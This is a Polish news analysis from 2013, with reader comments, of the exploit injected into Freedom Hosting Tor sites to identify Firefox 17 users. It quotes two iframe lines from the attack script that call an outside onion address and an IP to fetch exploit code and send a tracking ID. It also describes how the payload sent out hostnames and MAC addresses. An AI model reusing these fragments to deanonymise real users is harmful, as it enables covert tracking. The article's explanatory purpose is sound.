05.08.2013 | 11:53

Adam Haertle

Analiza najnowszego ataku 0day na Firefoxa używanego w TOR Bundle

Zamknięcie Freedom Hosting oraz aresztowanie jego właściciela zostawiło społeczność użytkowników TOR z dwoma pytaniami – jak FBI znalazło podejrzanego oraz czy było w stanie namierzyć użytkowników TORa. Odpowiedź na to drugie pytanie już znamy.

Wczoraj opisaliśmy wydarzenia, które miały miejsce w sieci TOR w ciągu ostatnich dni. Jednym z najważniejszych ich elementów było podejrzenie ataku 0day na użytkowników niektórych ukrytych serwisów. W komentarzu do wiadomości o zatrzymaniu założyciela Freedom Hosting w serwisie Reddit pojawiła się ciekawa informacja. Jeden z użytkowników informował, że administrator pedofilskiego forum 4pedo ostrzegł przed skryptem JS, który znalazł się bez jego wiedzy w jego serwisie. Padło podejrzenie, że skrypt ten serwowany był z serwera Freedom Hosting, do którego prawdopodobnie dostęp uzyskało FBI.

Jak działał skrypt i jaka była jego funkcjonalność?

Do bliżej niezidentyfikowanych stron, serwowanych przez Freedom Hosting, wrzucany był krótki skrypt JS. W sieci dostępne są co najmniej dwa warianty, jednak ich najważniejszy fragment wygląda podobnie:

iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";

lub

iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";

Fragment ten powoduje wczytanie przez przeglądarkę kolejnej porcji kodu oraz wysyła do zewnętrznego serwera unikalny identyfikator użytkownika, generowany przez serwer FH.

Wczytywany z zewnętrznego serwera kod zawiera exploit na Firefoxa. Zanim jednak zostanie od wykonany, najpierw weryfikowana jest wersja przeglądarki. Kod exploita uruchamiany jest wyłącznie na Frefoxie 17 (mimo iż działa na wersjach do 21 włącznie). Oznacza to, że atak jest skierowany na użytkowników pakietu Tor Browser Bundle, najpopularniejszego narzędzia użytkowników sieci TOR. Czemu TBB korzysta z Firefoxa 17, skoro dostępna jest już wersja 22? Firefox 17 to aktualna wersja ESR (extended support release), przeznaczona dla przedsiębiorstw, którym zależy tylko na poprawkach bezpieczeństwa a nie na nowej funkcjonalności. Wobec częstego wypuszczania aktualizacji Firefoxa niektóre firmy wolą nie ryzykować wdrażania nowej wersji co 6 tygodni, lecz pozostają przy wersji sprawdzonej, która jest aktualizowana tylko wtedy, gdy zostanie wykryta w niej luka bezpieczeństwa. Z tej samej wersji z tych samych powodów korzysta TBB.

Co robi exploit?

Kod głównego exploita zawiera zakodowany zestaw poleceń, który został ostatniej nocy przeanalizowany przez Vlada Tsyrklevicha. Jego działanie wskazuje wprost na jeden cel – identyfikację użytkownika. W momencie wykonania exploit łączy się z serwerem 65.222.202.54 (w tej samej klasie adresowej co poprzednio użyty link), gdzie przesyła nazwę komputera oraz adres MAC karty sieciowej, pobrane z komputera, na którym został uruchomiony. Wysyłając te dane korzysta z adresu IP komputera, zatem również ta informacja trafia do nieznanego odbiorcy. Nie znaleźliśmy informacji o tym, czy exploit potrafi wysłać dane łącząc się z siecią bezpośrednio, a nie przez TORa. Nawet jeśli tego nie potrafi, to MAC adres komputera może często naprowadzić na tożsamość użytkownika. Wymaga to współpracy producentów i dystrybutorów sprzętu oraz długiej pracy śledczych, ale w wielu przypadkach jest możliwe.

Czy to na pewno 0day?

Zespół Mozilli potwierdził, ze w ataku użyto błędu MFSA2013-53 (CVE2013-1690), znanego publicznie od 25 czerwca 2013, a odkrytego kilka miesięcy wcześniej przez badacza znanego jako Nils. Błąd ten został załatany w wersji 17.0.7 oraz 22 wydanych właśnie 25 czerwca. Wersja 17.0.7 weszła w skład Tor Browser Bundle już 26go czerwca, więc trudno tu mówić o ataku 0day.

Kto był podatny na atak?

Powyższe informacje wskazują, że na atak podatni byli jedynie użytkownicy, spełniający wszystkie 3 warunki:

  • korzystający z wersji TBB sprzed 26go czerwca (Firefox 17.0.6 lub starszy)
  • korzystający z domyślnej konfiguracji bez wyłączonego JavaScriptu
  • korzystający z TBB bezpośrednio na komputerze, a nie w maszynie wirtualnej, tunelowanej przez TOR (np. Whonix)

Oznacza to, że grono potencjalnych ofiar ograniczone było do przypadków przejawiających mniejszych instynkt samozachowawczy oraz niższy poziom paranoi.

Kto stał za atakiem?

Jeśli spojrzymy tylko na dostępne fakty, to nie posiadamy możliwości udzielenia wiarygodnej odpowiedzi na to pytanie. Jeśli jednak zauważymy, że ktoś stworzył własny shellcode oraz kod exploita, które zamieścił nieznanym jeszcze sposobem na witrynie w sieci TOR, zawierającej pornografię dziecięcą, a do tego nie próbował instalować na komputerach użytkowników żadnego złośliwego oprogramowania, to trudno nie skojarzyć tego z aresztowaniem założyciela Freedom Hosting na zlecenie FBI. Dodatkowo już od wielu lat dokumenty ujawniane w trakcie procesów przestępców pokazują, że FBI korzysta z podobnego oprogramowania o nazwie CIPAV (computer and internet protocol address verifier) służącego do identyfikacji przestępców. Czas pokaże, czy ta teoria okaże się słuszna.

Powrót

Komentarze

  • 2013.08.05 13:29 John

    Maja przegwizdane czy już 'po nich’ ?

    Odpowiedz
    • 2013.08.05 14:47 agilob

      Pytasz czy po Tobie? ;)

      // ostatni link jest zle wklejony, brakuje http://

      Odpowiedz
  • 2013.08.05 14:22 Filigranowy

    OK… jeśli więc znalazłbym się w grupie osób, które uległy temu atakowi, a akurat nie uzywam TORmaila do żadnych nielegalnych procederów… to powinienem oskarżyć władze USA o włamanie i uzyskanie bezprawnego dostępu do moich danych osobowych.
    Jak się zabrać do tego?

    Odpowiedz
    • 2013.08.10 10:12 Amadeusz

      Musisz najpierw udowodnić, że to było FBI a jako, że Tor jest nastawiony na anonimowość…

      Odpowiedz
  • 2013.08.05 14:48 Techblog

    Ciekawe czy FBI maczało w tym palce jak skończy się sprawa aresztowania.

    Odpowiedz
    • 2013.08.05 17:58 Melchior

      To zależy ale spodziewam się finału jak z dotcomem (tyle że dotcom był w nz a w usa mają mniej subtelne metody wyciągania zeznań rodem z Łubianki)

      Odpowiedz
  • 2013.08.05 23:17 Adrian

    Przez pedofilów wszyscy możemy mieć problemy.
    Jestem administratorem pewnej strony internetowej.
    TOR to prawdziwe źródło informacji- można dowiedzieć się o włamaniach a poza tym sam w sobie jest tematem na wiele artykułów.
    I co z nami?
    Przyjadą do mnie o 6 rano?
    Zabiorą wszystkie nośniki i mnie na komisariat?
    Zrównają mnie z pedofilem?

    Odpowiedz
  • 2013.08.06 02:46 nic

    Od kiedy te ataki mające na celu wyłowienie użytkowników tora miały miejsce? Przez ostatnie dni czy dłużej

    Odpowiedz
    • 2013.08.06 11:33 ASUASU

      Niby od ostatniego tygodnia lipca, ale nigdy nie wiadomo czy dłużej tego nie prowadzili.

      Odpowiedz
    • 2013.08.06 15:53 Adrian

      Widzę że masz coś na sumieniu?
      Wszystko zależy od ich intencji.
      Jak będą chcieli cię wsadzić to i tak to zrobią- nawet za pirackiego Windowsa.

      Odpowiedz
      • 2013.08.06 16:07 kali

        Pokaż mi osobę, która nie ma nic na sumieniu.

        Odpowiedz
      • 2013.08.06 16:59 nic

        nie mam na sumieniu nic. Ale oni wyłapywali namiary na wszystkich, którzy w ogóle korzystali ze stron na tym hostingu a nie tylko ludzi, ktorzy coś robili, wystarczyło wejśćna stronkę. Nieważne co się tam robiło. także może się oberwać komuś kto tam wszedł i po prostu sobie przeglądał.

        Odpowiedz
  • 2013.08.06 15:58 progeo

    Kazdy uczciwy czlowiek powinien zwalczac pedofili – jezeli nie jestes nim badz spokojny!

    Odpowiedz
    • 2013.08.06 17:51 Adrian

      Podejrzewam że skrypt rejestrował wszystkich- nieważne czy byłeś na forum dla homoniewiadomo czy na tormailu.
      I jeżeli dojdzie do przeszukań sprawdzą zarówno komputer pedofila jak i niewinnego człowieka.
      A jak wiadomo wieść się niesie- zaraz będą krążyć plotki że policja pedofila znalazła.
      I jak potem żyć jak mohery pod kościołem będą palcem na ciebie pokazywać!?
      Nieważne że będziesz niewinny.

      Odpowiedz
  • 2013.08.07 11:28 Panatan

    Jeżeli przy tworzeniu tej wiadomości korzystaliście z bloga Briana Krebsa, to należy się jakaś wzmianka. Fragmenty waszej i jego wiadomości wyglądają dość podobnie ;)

    Odpowiedz
    • 2013.08.07 11:39 Adam

      Opisują ten sam temat, więc trudno, żeby nie zawierały podobnych elementów, jednak zarówno na z3s jest sporo informacji, których nie ma u Krebsa (chociażby cała część techniczna), jak i odwrotnie. A przed napisaniem artykułu przeczytaliśmy ze 30 innych i wszystkie pierwotne źródła, z których korzystaliśmy, są zlinkowane w treści.

      Odpowiedz
  • 2013.08.07 12:21 nicsensacyjnego.pl

    Ale bzdury. Wszyscy wiemy że to nie FBI stało za operacją. Tylko Zdzisław Dyrman wraz ze swoim skryptem, którym nie zdoławszy zdosować adresu wcgk6z6zgem7gq2w.onion wkur*** się na opieszałość admina fridoma. Toteż postanowił zmieść z powierzchni Ziemi całe FH. I kto jest teraz górą?

    Odpowiedz
  • 2013.08.07 20:58 Adrian

    Adres IP 65.222.202.53 prawdopodobnie pochodzi z USA.

    Odpowiedz
  • 2013.08.27 21:37 Marecki

    W jaki sposób po MACu służby miałyby zidentyfikować użytkownika? Rozumiem że pewnie są w stanie odtworzyć model wykorzystywanego sprzętu i kraj w którym został sprzedany, ale co dalej?

    Odpowiedz
    • 2013.08.27 22:52 Adam

      Proste. Np. znajdują MAC adres zaczynający się od 0026B9 i wiedzą, że to Dell. Zwracają się więc do Della, który wie, że komputer z ta kartą sieciową sprzedał firmie X. A firma X wie, że ten komputer dostał w użytkowanie pracownik Y. Oczywiście nie zawsze ta metoda zadziała, ale dla części przypadków może być skuteczna.

      Odpowiedz
    • 2020.12.03 14:30 bickiewicz

      Mając już takiego delikwenta w rękach ma się przeciwko niemu dowód (MAC zarejestrowany przez exploita zgadza się z MACiem zabepieczonego przez CBŚ sprzętu) Łatwiej go wtedy zmusić, żeby się przyznał.

      Odpowiedz

Zostaw odpowiedź do Adam

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Analiza najnowszego ataku 0day na Firefoxa używanego w TOR Bundle

Komentarze